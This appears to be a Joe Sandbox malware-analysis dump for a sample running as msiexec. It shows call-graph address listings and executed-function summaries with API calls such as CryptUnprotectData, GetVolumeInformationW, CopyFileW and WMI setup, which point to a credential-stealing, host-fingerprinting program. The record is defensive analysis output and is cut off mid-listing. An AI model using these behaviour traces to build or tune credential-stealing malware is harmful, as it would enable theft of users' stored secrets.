27581->27561 27582->27563 27584 61938a0 ___scrt_is_nonwritable_in_current_image 27583->27584 27585 61938e1 27584->27585 27587 6193927 27584->27587 27593 61938a8 27584->27593 27586 618e1fc __wsopen_s 39 API calls 27585->27586 27586->27593 27588 6199714 __wsopen_s EnterCriticalSection 27587->27588 27589 619392d 27588->27589 27590 619394b 27589->27590 27591 61939a5 __wsopen_s 62 API calls 27589->27591 27592 619399d __wsopen_s LeaveCriticalSection 27590->27592 27591->27590 27592->27593 27593->27571 27594->27578 27595->27580 27598 618476a _Yarn 27596->27598 27600 618468a _Yarn 27596->27600 27597 618481e 27597->27372 27598->27597 27604 618d593 27598->27604 27600->27372 27601->27369 27602->27374 27603->27375 27605 618d5a6 __wsopen_s 27604->27605 27610 618d375 27605->27610 27607 618d5bb 27618 618c8fb 39 API calls __wsopen_s 27607->27618 27609 618d5c8 27609->27597 27611 618d383 27610->27611 27616 618d3ab 27610->27616 27612 618d390 27611->27612 27613 618d3b2 27611->27613 27611->27616 27627 618e1fc 39 API calls 2 library calls 27612->27627 27619 618d2ce 27613->27619 27616->27607 27618->27609 27620 618d2da ___scrt_is_nonwritable_in_current_image 27619->27620 27628 618d2a6 EnterCriticalSection 27620->27628 27622 618d2e8 27629 618d329 27622->27629 27626 618d306 27626->27607 27627->27616 27628->27622 27637 61949f8 27629->27637 27635 618d2f5 27636 618d31d LeaveCriticalSection ___scrt_uninitialize_crt 27635->27636 27636->27626 27638 61949ba 39 API calls 27637->27638 27639 6194a09 27638->27639 27640 6194a58 27639->27640 27643 618d341 27639->27643 27641 6195d59 std::_Locinfo::_Locinfo_ctor 15 API calls 27640->27641 27642 6194a62 27641->27642 27644 6193bc1 ___free_lconv_mon 14 API calls 27642->27644 27646 618d3ec 27643->27646 27645 6194a6b 27644->27645 27645->27643 27649 618d3fe 27646->27649 27650 618d35f 27646->27650 27647 618d40c 27648 618e1fc __wsopen_s 39 API calls 27647->27648 27648->27650 27649->27647 27649->27650 27653 618d442 _Yarn 27649->27653 27655 6194aa3 64 API calls ___scrt_uninitialize_crt 27650->27655 27651 618cd68 ___scrt_uninitialize_crt 64 API calls 27651->27653 27652 6192502 ___scrt_uninitialize_crt 39 API calls 27652->27653 27653->27650 27653->27651 27653->27652 27654 6193894 __wsopen_s 64 API calls 27653->27654 27654->27653 27655->27635 27657 6185b0c 27656->27657 27658 6185a6d 27656->27658 27659 6187f1e __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 27657->27659 27658->27657 27665 6185a77 27658->27665 27660 6185b19 27659->27660 27660->27382 27661 6185afa 27662 6187f1e __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 27661->27662 27663 6185b08 27662->27663 27663->27382 27664 6185ac2 27668 6185ae3 27664->27668 27670 618d593 67 API calls 27664->27670 27665->27661 27665->27664 27666 6185aa8 27665->27666 27666->27661 27667 6185aad 27666->27667 27669 6187f1e __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 27667->27669 27671 6187f1e __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 27668->27671 27672 6185abe 27669->27672 27673 6185adc 27670->27673 27674 6185af6 27671->27674 27672->27382 27673->27661 27673->27668 27674->27382 27675->27393 27676->27395 27677->27397 27678->27399 27679->27280 27680->27288 27682 618f833 27681->27682 27690 618f844 27681->27690 27683 6188cf0 std::locale::_Setgloballocale GetModuleHandleW 27682->27683 27685 618f838 27683->27685 27685->27690 27707 618f8e7 GetModuleHandleExW 27685->27707 27687 618f882 27687->27007 27692 618f6b2 27690->27692 27691 618f897 27693 618f6be ___scrt_is_nonwritable_in_current_image 27692->27693 27713 618e31b EnterCriticalSection 27693->27713 27695 618f6c8 27714 618f71e 27695->27714 27697 618f6d5 27718 618f6f3 27697->27718 27700 618f89d 27723 618f8ce 27700->27723 27702 618f8a7 27703 618f8bb 27702->27703 27704 618f8ab GetCurrentProcess TerminateProcess 27702->27704 27705 618f8e7 std::locale::_Setgloballocale 3 API calls 27703->27705 27704->27703 27706 618f8c3 ExitProcess 27705->27706 27708 618f926 GetProcAddress 27707->27708 27709 618f947 27707->27709 27708->27709 27710 618f93a 27708->27710 27711 618f94d FreeLibrary 27709->27711 27712 618f956 27709->27712 27710->27709 27711->27712 27712->27690 27713->27695 27716 618f72a ___scrt_is_nonwritable_in_current_image std::locale::_Setgloballocale 27714->27716 27715 618f78e std::locale::_Setgloballocale 27715->27697 27716->27715 27721 6190192 14 API calls 2 library calls 27716->27721 27722 618e363 LeaveCriticalSection 27718->27722 27720 618f6e1 27720->27687 27720->27700 27721->27715 27722->27720 27726 61982dd 5 API calls std::locale::_Setgloballocale 27723->27726 27725 618f8d3 std::locale::_Setgloballocale 27725->27702 27726->27725 27727->27035 27728->27033 26866 30b7b2 CoSetProxyBlanket 26867 3087f2 26869 308811 26867->26869 26868 3088db FreeLibrary 26870 3088ec 26868->26870 26869->26868 26869->26869 27729 3163d2 RtlAllocateHeap 26871 319779 26872 3197b0 26871->26872 26874 3197ee 26872->26874 26875 319510 LdrInitializeThunk 26872->26875 26875->26874 26876 2ed5e6 26877 2ed610 26876->26877 26894 2ffd20 26877->26894 26879 2ed7f9 26898 2fff40 26879->26898 26881 2ed819 26910 301aa0 26881->26910 26883 2ed839 26884 3023d0 LdrInitializeThunk 26883->26884 26885 2ed842 26884->26885 26886 302740 CopyFileW LdrInitializeThunk 26885->26886 26887 2ed84b 26886->26887 26888 304ff0 LdrInitializeThunk 26887->26888 26889 2ed854 26888->26889 26890 3041f0 LdrInitializeThunk 26889->26890 26891 2ed874 26890->26891 26892 30da40 6 API calls 26891->26892 26893 2ed89d 26892->26893 26895 2ffd30 26894->26895 26913 2fb2c0 26895->26913 26897 2fff1f 26897->26879 26899 2fff4e 26898->26899 26922 31d310 LdrInitializeThunk 26899->26922 26901 300014 26903 2fff1f 26901->26903 26904 2ffd30 26901->26904 26905 3000d1 26901->26905 26923 31d700 LdrInitializeThunk 26901->26923 26903->26881 26909 2fb2c0 LdrInitializeThunk 26904->26909 26924 31d430 LdrInitializeThunk 26905->26924 26907 300102 26907->26903 26925 31d310 LdrInitializeThunk 26907->26925 26909->26903 26912 301acd 26910->26912 26926 31d310 LdrInitializeThunk 26912->26926 26914 2fb2d0 26913->26914 26917 31cd70 26914->26917 26916 2fb324 26916->26897 26916->26916 26918 31cd90 26917->26918 26919 31cece 26918->26919 26921 319510 LdrInitializeThunk 26918->26921 26919->26916 26921->26919 26922->26901 26923->26901 26924->26907 26925->26903 26926->26912 27730 308359 27731 308363 27730->27731 27734 313870 27731->27734 27735 31387e 27734->27735 27739 313953 27735->27739 27743 319510 LdrInitializeThunk 27735->27743 27736 30846b 27739->27736 27741 313a3a 27739->27741 27742 319510 LdrInitializeThunk 27739->27742 27741->27736 27744 319510 LdrInitializeThunk 27741->27744 27742->27739 27743->27735 27744->27741 26927 2f41a5 26928 2f4370 26927->26928 26929 2f41b3 26927->26929 26928->26928 26929->26928 26930 31cd70 LdrInitializeThunk 26929->26930 26930->26929 26931 319fbb GetForegroundWindow 26935 31c9d0 26931->26935 26933 319fc9 GetForegroundWindow 26934 319fda 26933->26934 26936 31c9e0 26935->26936 26936->26933 26937 2ed063 CoInitializeSecurity 26938 2e8c60 26940 2e8c6c 26938->26940 26939 2e8f31 ExitProcess 26940->26939 26941 2e8f2c 26940->26941 26942 2e8c81 GetCurrentThreadId 26940->26942 26952 319410 FreeLibrary 26941->26952 26944 2e8cba GetForegroundWindow 26942->26944 26946 2e8e21 GetCurrentProcessId 26944->26946 26947 2e8ed1 26944->26947 26946->26947 26947->26941 26951 2ed030 CoInitializeEx 26947->26951 26952->26939 27751 2fd080 27752 2fd0d0 27751->27752 27753 2fd08e 27751->27753 27757 2fd190 27753->27757 27758 2fd1a0 27757->27758 27758->27758 27759 31cd70 LdrInitializeThunk 27758->27759 27760 2fd2b1 27759->27760 27761 2ff31f 27762 2ff380 27761->27762 27763 31cd70 LdrInitializeThunk 27762->27763 27765 2ff4ef 27763->27765 27764 31cd70 LdrInitializeThunk 27764->27765 27765->27764 27765->27765 26953 313ba0 26954 313c00 CoCreateInstance 26953->26954 26956 3141b5 26954->26956 26957 313caf SysAllocString 26954->26957 26958 3141cd GetVolumeInformationW 26956->26958 26960 313d3a 26957->26960 26967 3141e8 26958->26967 26961 3141a1 SysFreeString 26960->26961 26962 313d49 CoSetProxyBlanket 26960->26962 26961->26956 26963 314197 26962->26963 26964 313d69 SysAllocString 26962->26964 26963->26961 26966 313e40 26964->26966 26966->26966 26968 313e71 SysAllocString 26966->26968 26969 313e98 26968->26969 26970 31417e SysFreeString SysFreeString 26969->26970 26971 314174 26969->26971 26972 313edc VariantInit 26969->26972 26970->26963 26971->26970 26974 313f40 26972->26974 26973 314163 VariantClear 26973->26971 26974->26973 27771 316480 27772 3164b0 27771->27772 27774 3164ee 27772->27774 27777 319510 LdrInitializeThunk 27772->27777 27774->27774 27775 3165e9 27774->27775 27778 319510 LdrInitializeThunk 27774->27778 27777->27774 27778->27775 27779 2f011d 27782 2f0140 27779->27782 27780 2ee503 27782->27780 27783 2f35b0 27782->27783 27784 2f35d0 27783->27784 27784->27784 27798 31cbd0 27784->27798 27786 2f377a 27787 2f379c 27786->27787 27790 2f3977 27786->27790 27791 2f37d9 27786->27791 27793 2f37ca 27786->27793 27802 31cf20 LdrInitializeThunk 27786->27802 27787->27790 27787->27791 27787->27793 27803 31d000 27787->27803 27790->27791 27811 319510 LdrInitializeThunk 27790->27811 27791->27780 27793->27790 27793->27791 27794 31cbd0 LdrInitializeThunk 27793->27794 27796 31d000 LdrInitializeThunk 27793->27796 27809 31cf20 LdrInitializeThunk 27793->27809 27810 319510 LdrInitializeThunk 27793->27810 27794->27793 27796->27793 27799 31cbf0 27798->27799 27800 31cd1e 27799->27800 27812 319510 LdrInitializeThunk 27799->27812 27800->27786 27802->27787 27804 31d030 27803->27804 27807 31d08e 27804->27807 27813 319510 LdrInitializeThunk 27804->27813 27805 31d13e 27805->27793 27807->27805 27814 319510 LdrInitializeThunk 27807->27814 27809->27793 27810->27793 27811->27791 27812->27800 27813->27807 27814->27805 27815 61966ac 27820 6196441 27815->27820 27818 61966eb 27821 619646f ___vcrt_FlsSetValue 27820->27821 27821->27821 27822 61965bf 27821->27822 27835 619c547 40 API calls 2 library calls 27821->27835 27826 61965ca 27822->27826 27838 618ee44 14 API calls __dosmaperr 27822->27838 27824 619669a 27839 618e279 39 API calls __wsopen_s 27824->27839 27826->27818 27832 619cf7a 27826->27832 27828 6196627 27828->27822 27836 619c547 40 API calls 2 library calls 27828->27836 27830 6196645 27830->27822 27837 619c547 40 API calls 2 library calls 27830->27837 27840 619c666 27832->27840 27835->27828 27836->27830 27837->27822 27838->27824 27839->27826 27843 619c672 ___scrt_is_nonwritable_in_current_image 27840->27843 27841 619c679 27898 618ee44 14 API calls __dosmaperr 27841->27898 27843->27841 27845 619c6a4 27843->27845 27844 619c67e 27899 618e279 39 API calls __wsopen_s 27844->27899 27851 619cc50 27845->27851 27848 619c688 27848->27818 27901 619ca2c 27851->27901 27854 619cc9b 27919 61997ec 27854->27919 27855 619cc82 27933 618ee31 14 API calls __dosmaperr 27855->27933 27859 619cca9 27935 618ee31 14 API calls __dosmaperr 27859->27935 27860 619ccc0 27932 619c997 CreateFileW 27860->27932 27864 619c6c8 27900 619c6fb LeaveCriticalSection __wsopen_s 27864->27900 27865 619ccae 27936 618ee44 14 API calls __dosmaperr 27865->27936 27866 619ccf9 27867 619cd76 GetFileType 27866->27867 27870 619cd4b GetLastError 27866->27870 27937 619c997 CreateFileW 27866->27937 27871 619cdc8 27867->27871 27872 619cd81 GetLastError 27867->27872 27869 619cc87 27934 618ee44 14 API calls __dosmaperr 27869->27934 27938 618edea 14 API calls __dosmaperr 27870->27938 27941 6199737 15 API calls 2 library calls 27871->27941 27939 618edea 14 API calls __dosmaperr 27872->27939 27876 619cd8f CloseHandle 27876->27869 27877 619cdb8 27876->27877 27940 618ee44 14 API calls __dosmaperr 27877->27940 27879 619cd3e 27879->27867 27879->27870 27881 619cde9 27883 619ce35 27881->27883 27942 619cba6 73 API calls 2 library calls 27881->27942 27882 619cdbd 27882->27869 27888 619ce3c 27883->27888 27944 619c741 73 API calls 3 library calls 27883->27944 27886 619ce6a 27887 619ce78 27886->27887 27886->27888 27887->27864 27890 619cef4 CloseHandle 27887->27890 27943 6193d2f 42 API calls __wsopen_s 27888->27943 27945 619c997 CreateFileW 27890->27945 27892 619cf1f 27893 619cf29 GetLastError 27892->27893 27894 619cf55 27892->27894 27946 618edea 14 API calls __dosmaperr 27893->27946 27894->27864 27896 619cf35 27947 61998ff 15 API calls 2 library calls 27896->27947 27898->27844 27899->27848 27900->27848 27902 619ca4d 27901->27902 27907 619ca67 27901->27907 27902->27907 27955 618ee44 14 API calls __dosmaperr 27902->27955 27905 619ca5c 27956 618e279 39 API calls __wsopen_s 27905->27956 27948 619c9bc 27907->27948 27908 619cace 27918 619cb21 27908->27918 27959 61904a1 39 API calls 2 library calls 27908->27959 27909 619ca9f 27909->27908 27957 618ee44 14 API calls __dosmaperr 27909->27957 27912 619cb1c 27914 619cb99 27912->27914 27912->27918 27913 619cac3 27958 618e279 39 API calls __wsopen_s 27913->27958 27960 618e2a6 11 API calls std::locale::_Setgloballocale 27914->27960 27917 619cba5 27918->27854 27918->27855 27920 61997f8 ___scrt_is_nonwritable_in_current_image 27919->27920 27963 618e31b EnterCriticalSection 27920->27963 27922 61997ff 27923 6199824 27922->27923 27927 6199893 EnterCriticalSection 27922->27927 27929 6199846 27922->27929 27967 61995c6 15 API calls 3 library calls 27923->27967 27927->27929 27930 61998a0 LeaveCriticalSection 27927->27930 27928 6199829 27928->27929 27968 6199714 EnterCriticalSection 27928->27968 27964 61998f6 27929->27964 27930->27922 27932->27866 27933->27869 27934->27864 27935->27865 27936->27869 27937->27879 27938->27869 27939->27876 27940->27882 27941->27881 27942->27883 27943->27864 27944->27886 27945->27892 27946->27896 27947->27894 27950 619c9d4 27948->27950 27949 619c9ef 27949->27909 27950->27949 27961 618ee44 14 API calls __dosmaperr 27950->27961 27952 619ca13 27962 618e279 39 API calls __wsopen_s 27952->27962 27954 619ca1e 27954->27909 27955->27905 27956->27907 27957->27913 27958->27908 27959->27912 27960->27917 27961->27952 27962->27954 27963->27922 27969 618e363 LeaveCriticalSection 27964->27969 27966 6199866 27966->27859 27966->27860 27967->27928 27968->27929 27969->27966 27970 2f3dd8 27972 2f3de0 27970->27972 27971 2f3e8f CryptUnprotectData 27971->27972 27972->27971 26975 2ed8b7 26976 2ed8bd 26975->26976 26977 2ed8cc CoUninitialize 26976->26977 26978 2ed900 26977->26978 26979 3074aa 26981 3074e0 26979->26981 26980 30764e 26981->26980 26983 319510 LdrInitializeThunk 26981->26983 26983->26980 26984 31646e 26985 316474 RtlFreeHeap 26984->26985

                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                Function 00313BA0 Relevance: 25.1, APIs: 11, Strings: 3, Instructions: 648memorycomCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 92 313ba0-313bf4 93 313c00-313c33 92->93 93->93 94 313c35-313c4f 93->94 96 313c51 94->96 97 313c5c-313ca9 CoCreateInstance 94->97 96->97 98 3141b5-3141e2 call 31c130 GetVolumeInformationW 97->98 99 313caf-313ce9 97->99 104 3141e8-31422a call 2fa140 98->104 105 31439e-3143a5 98->105 101 313cf0-313d0a 99->101 101->101 103 313d0c-313d43 SysAllocString 101->103 108 3141a1-3141b1 SysFreeString 103->108 109 313d49-313d63 CoSetProxyBlanket 103->109 113 314230-314238 104->113 108->98 111 314197-31419d 109->111 112 313d69-313d83 109->112 111->108 114 313d90-313db5 112->114 113->113 115 31423a-31423c 113->115 114->114 116 313db7-313e3b SysAllocString 114->116 117 31424e-31429f call 2fa140 115->117 118 31423e-31424b call 2e8540 115->118 119 313e40-313e6f 116->119 125 3142a0-3142a8 117->125 118->117 119->119 123 313e71-313e9a SysAllocString 119->123 130 313ea0-313ec2 123->130 131 31417e-314190 SysFreeString * 2 123->131 125->125 126 3142aa-3142ac 125->126 128 3142be-31430d call 2fa140 126->128 129 3142ae-3142bb call 2e8540 126->129 137 314310-314318 128->137 129->128 138 314174-31417a 130->138 139 313ec8-313ecb 130->139 131->111 137->137 140 31431a-31431c 137->140 138->131 139->138 141 313ed1-313ed6 139->141 142 31432e-31437f call 2fa140 140->142 143 31431e-31432b call 2e8540 140->143 141->138 144 313edc-313f35 VariantInit 141->144 151 314380-314388 142->151 143->142 146 313f40-313f6d 144->146 146->146 150 313f6f-313f8a 146->150 154 313f90-313f96 150->154 155 314163-314170 VariantClear 150->155 151->151 153 31438a-31438c 151->153 153->105 156 31438e-31439b call 2e8540 153->156 154->155 157 313f9c-313fa6 154->157 155->138 156->105 159 313fa8-313fad 157->159 160 313fdd 157->160 162 313fbc-313fc0 159->162 163 313fdf-313ffa call 2e84c0 160->163 164 313fb0 162->164 165 313fc2-313fcb 162->165 171 314000-31400a 163->171 172 31411f-314135 163->172 167 313fb1-313fba 164->167 168 313fd2-313fd6 165->168 169 313fcd-313fd0 165->169 167->162 167->163 168->167 173 313fd8-313fdb 168->173 169->167 171->172 174 314010-314018 171->174 175 314137-314141 172->175 176 314156-31415f call 2e84d0 172->176 173->167 177 314020-31402a 174->177 175->176 178 314143-31414d 175->178 176->155 180 314040-314046 177->180 181 31402c-314031 177->181 178->176 182 31414f-314152 178->182 185 314064-314070 180->185 186 314048-31404b 180->186 184 3140c0-3140ca 181->184 182->176 190 3140cc-3140d5 184->190 188 3140e1-3140e9 185->188 189 314072-314075 185->189 186->185 187 31404d-314062 186->187 187->184 193 3140f3-3140f6 188->193 194 3140eb-3140f1 188->194 189->188 191 314077-3140b9 189->191 190->172 192 3140d7-3140d9 190->192 191->184 192->177 197 3140df 192->197 195 3140f8-314119 193->195 196 31411b-31411d 193->196 194->190 195->184 196->184 197->172
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CoCreateInstance.OLE32(0031F680,00000000,00000001,0031F670,00000000), ref: 00313CA1
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(398B3B82), ref: 00313D11
                                                                                                                                                                                                                                • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00313D5B
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(398B3B82), ref: 00313DB8
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(49F14BE1), ref: 00313E76
                                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00313EE1
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocString$BlanketCreateInitInstanceProxyVariant
                                                                                                                                                                                                                                • String ID: C$E!q#$\
                                                                                                                                                                                                                                • API String ID: 65563702-541809082
                                                                                                                                                                                                                                • Opcode ID: 4ff27c135f18b3f90a2921892921384a001120378a73ffae443729098db614c5
                                                                                                                                                                                                                                • Instruction ID: 349d0a3fa53b40e89a8c16a7107115dde002207d3d70210679dcfa507bc2903c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4ff27c135f18b3f90a2921892921384a001120378a73ffae443729098db614c5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 77223171A083009FD319CF24CC41BABBBE5EF89314F098A2CF9999B281D774D945CB92
                                                                                                                                                                                                                                Function 002F011D Relevance: 13.2, Strings: 10, Instructions: 653COMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 479 2f011d-2f013b 480 2f0140-2f014e 479->480 480->480 481 2f0150-2f0154 480->481 482 2f0156-2f0159 481->482 483 2f015b-2f01a0 482->483 484 2f01a2-2f01da call 2e1880 482->484 483->482 487 2f01df-2f01ed 484->487 487->487 488 2f01ef 487->488 489 2f01f1-2f01f4 488->489 490 2f01f6-2f0242 489->490 491 2f0244-2f026e call 2e1880 489->491 490->489 494 2f0272-2f0276 491->494 495 2f0270-2f02a0 call 2f2da0 491->495 497 2f0a5e 494->497 503 2f02a4-2f02f5 call 2e84c0 call 2eadb0 call 2f2da0 495->503 504 2f02a2 495->504 499 2f1022 497->499 500 2f1024-2f1030 call 2e2030 499->500 510 2ee50f-2f1041 500->510 511 2ee516-2ee542 call 2e2040 500->511 519 2f02f9-2f0340 call 2e84c0 call 2eadb0 503->519 520 2f02f7 503->520 504->503 518 2ee547-2ee555 511->518 518->518 521 2ee557 518->521 533 2f0345-2f0353 519->533 520->519 523 2ee559-2ee55c 521->523 525 2ee55e-2ee579 523->525 526 2ee57b-2ee5aa call 2e1f10 523->526 525->523 531 2ee5ae 526->531 532 2ee5ac-2ee5d1 526->532 531->500 536 2ee5d6-2ee5e4 532->536 533->533 535 2f0355 533->535 537 2f0357-2f035a 535->537 536->536 538 2ee5e6-2ee5e8 536->538 539 2f035c-2f03a5 537->539 540 2f03a7-2f03c7 call 2e1880 537->540 541 2ee5ec-2ee5ef 538->541 539->537 546 2f041a-2f0438 540->546 547 2f03c9-2f03f0 call 2f2da0 540->547 544 2ee645-2ee68c call 2e19b0 541->544 545 2ee5f1-2ee643 541->545 544->499 553 2ee692 544->553 545->541 551 2f043d-2f044b 546->551 555 2f03f4-2f0415 call 2e84c0 call 2eadb0 547->555 556 2f03f2 547->556 551->551 554 2f044d 551->554 553->499 557 2f044f-2f0452 554->557 555->546 556->555 559 2f0454-2f046f 557->559 560 2f0471-2f0491 call 2e1880 557->560 559->557 565 2f04de-2f0500 560->565 566 2f0493-2f04b4 call 2f2da0 560->566 568 2f0503-2f050e 565->568 571 2f04b8-2f04d9 call 2e84c0 call 2eadb0 566->571 572 2f04b6 566->572 568->568 570 2f0510 568->570 573 2f0512-2f0515 570->573 571->565 572->571 575 2f056b-2f0589 call 2e1ae0 573->575 576 2f0517-2f0569 573->576 581 2f058f-2f05bc call 2e2030 575->581 582 2f095e-2f09c3 call 2e90a0 call 2f35b0 575->582 576->573 588 2f05be 581->588 589 2f05c0-2f05dd call 2e84c0 581->589 590 2f09c8-2f09d7 call 2e9b50 582->590 588->589 595 2f05df-2f05e6 589->595 596 2f05fc-2f0605 589->596 597 2f09d9-2f09e8 590->597 598 2f0a08-2f0a35 call 2e84d0 * 2 590->598 599 2f05e8-2f05f4 call 2f2f20 595->599 600 2f0607-2f060e 596->600 602 2f09fc-2f0a04 call 2e84d0 597->602 603 2f09ea 597->603 625 2f0a3f-2f0a46 598->625 626 2f0a37-2f0a3a call 2e84d0 598->626 615 2f05f6-2f05fa 599->615 605 2f061c-2f0659 call 2e2040 600->605 606 2f0610-2f0617 600->606 602->598 609 2f09ec-2f09f8 call 2f30c0 603->609 618 2f065e-2f066c 605->618 606->582 622 2f09fa 609->622 615->596 618->618 621 2f066e 618->621 624 2f0670-2f0673 621->624 622->602 627 2f06ea-2f0725 call 2e1880 624->627 628 2f0675-2f06e8 624->628 631 2f0a48-2f0a4b call 2e84d0 625->631 632 2f0a50-2f0a5c call 2e9190 625->632 626->625 636 2f072a-2f0735 627->636 628->624 631->632 632->497 636->636 638 2f0737-2f073d 636->638 639 2f0741-2f0744 638->639 640 2f07a6-2f07e3 call 2e1880 639->640 641 2f0746-2f07a4 639->641 644 2f07e5-2f07e8 640->644 641->639 645 2f07ea-2f080f 644->645 646 2f0811-2f085b call 2e1c10 644->646 645->644 649 2f0860-2f086e 646->649 649->649 650 2f0870 649->650 651 2f0872-2f0875 650->651 652 2f08ef-2f0959 call 2e1c10 call 2f2f40 651->652 653 2f0877-2f08ed 651->653 652->600 653->651
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: +$:$>$L$N$W$a$i$k$x
                                                                                                                                                                                                                                • API String ID: 0-1239699176
                                                                                                                                                                                                                                • Opcode ID: 3c54c9582772e8f90040d63e7661f6045403ff70ffc8544d980c8a8d9df85ccc
                                                                                                                                                                                                                                • Instruction ID: ba8f93fbef7e4f15ee6308724bb89c9e771a4974945e2f14ee0e2284b1955634
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3c54c9582772e8f90040d63e7661f6045403ff70ffc8544d980c8a8d9df85ccc
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B420372A1C7808BD7649F3884C53AEFBD1ABC5364F594A7DE9E9C73C2D67488408B42
                                                                                                                                                                                                                                Function 002FE9CF Relevance: 9.4, Strings: 7, Instructions: 679COMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 662 2fe9cf-2fe9de 663 2fec8f-2fec9b 662->663 664 2febbc-2febf3 662->664 665 2fea6b-2feb08 662->665 666 2fe9e5-2fe9ff 662->666 667 2febb5-2febb7 662->667 669 2fed9f-2fedaf 663->669 670 2fecca-2feccf 663->670 671 2fed69-2fed7e 663->671 672 2fed56-2fed62 663->672 673 2feca2-2fecc3 663->673 674 2fed40-2fed4f 663->674 676 2febff-2fec09 664->676 677 2febf5-2febfc 664->677 678 2feb10-2feb2d 665->678 668 2fea00-2fea24 666->668 675 2ff236-2ff240 667->675 668->668 697 2fea26-2fea36 668->697 679 2fed90-2fed98 669->679 680 2fee4e-2fee63 669->680 681 2fee0e-2fee19 669->681 682 2fefad-2fefba 669->682 683 2fece9-2fed2d call 31c130 * 2 669->683 684 2feee5-2feef7 669->684 685 2fefc1-2fefc6 669->685 686 2fee20-2fee47 call 2eadb0 669->686 687 2fef00-2fef12 669->687 688 2feebe-2feede 669->688 689 2fedb6-2fedc9 669->689 690 2fecd2-2fece2 669->690 691 2fee72-2fee7d 669->691 692 2feeb2-2feeb7 669->692 693 2fedd0-2fedea 669->693 694 2fecd0 669->694 695 2fee70 669->695 696 2fee90-2feeab 669->696 670->694 671->669 671->674 671->679 672->669 672->670 672->671 672->674 673->669 673->670 673->671 673->672 673->674 674->669 674->670 674->671 674->672 674->674 698 2fec10-2fec34 676->698 677->676 678->678 699 2feb2f-2feb34 678->699 679->669 679->674 680->695 681->680 681->681 681->682 681->684 681->686 681->687 681->688 681->691 681->692 681->695 681->696 682->685 705 2ff04e-2ff053 682->705 706 2ff1aa-2ff1c2 682->706 707 2ff1e9-2ff1fc 682->707 708 2ff005-2ff02d 682->708 709 2ff205-2ff20c 682->709 710 2ff203 682->710 711 2ff221-2ff233 682->711 712 2ff040-2ff045 682->712 713 2ff080-2ff090 682->713 714 2ff0e0-2ff0fb 682->714 715 2ff05c-2ff06c 682->715 716 2ff0da 682->716 717 2ff197-2ff1a3 682->717 718 2ff097-2ff0a7 682->718 719 2ff215 682->719 720 2ff034 682->720 721 2fefd2-2fefdd 682->721 722 2fefd0 682->722 723 2ff0b0-2ff0d1 682->723 724 2feff0-2feffe 682->724 725 2ff1d0-2ff1e2 